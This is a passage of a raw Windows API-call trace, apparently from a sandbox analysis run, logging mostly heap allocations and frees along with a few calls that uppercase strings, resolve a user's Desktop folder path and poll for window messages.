RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0101.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0101.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0101.424] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0101.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0101.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0101.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0101.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0101.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9040 [0101.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.424] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0101.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6728 [0101.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0101.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0101.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0101.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0101.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0101.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0101.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0101.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0101.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0101.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75510 [0101.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6728 | out: hHeap=0x2af0000) returned 1 [0101.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0101.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0101.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0101.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0101.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0101.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0101.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0101.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71eb8 [0101.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0101.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0101.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0101.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0101.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0101.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0101.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0101.472] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0101.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0101.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0101.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0101.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0101.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0101.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0101.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0101.472] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0101.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0101.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6418 [0101.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0101.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0101.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0101.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0101.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0101.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0101.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0101.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0101.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0101.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0101.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0101.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0101.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6418 | out: hHeap=0x2af0000) returned 1 [0101.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0101.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0101.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0101.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0101.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ec8 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0101.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71f88 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0101.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0101.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0101.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0101.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0101.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0101.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0101.474] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0101.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0101.474] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0101.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0101.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0101.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0101.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0101.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0101.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0101.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0101.474] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0101.475] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0101.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0101.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0101.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0101.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0101.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0101.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0101.475] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0101.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0101.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0101.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0101.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0101.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0101.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0101.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0101.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0101.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0101.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0101.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0101.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0101.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0101.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.477] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0101.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0101.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0101.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0101.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.477] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0101.478] HeapFree (in: hHeap=0x2af0000, 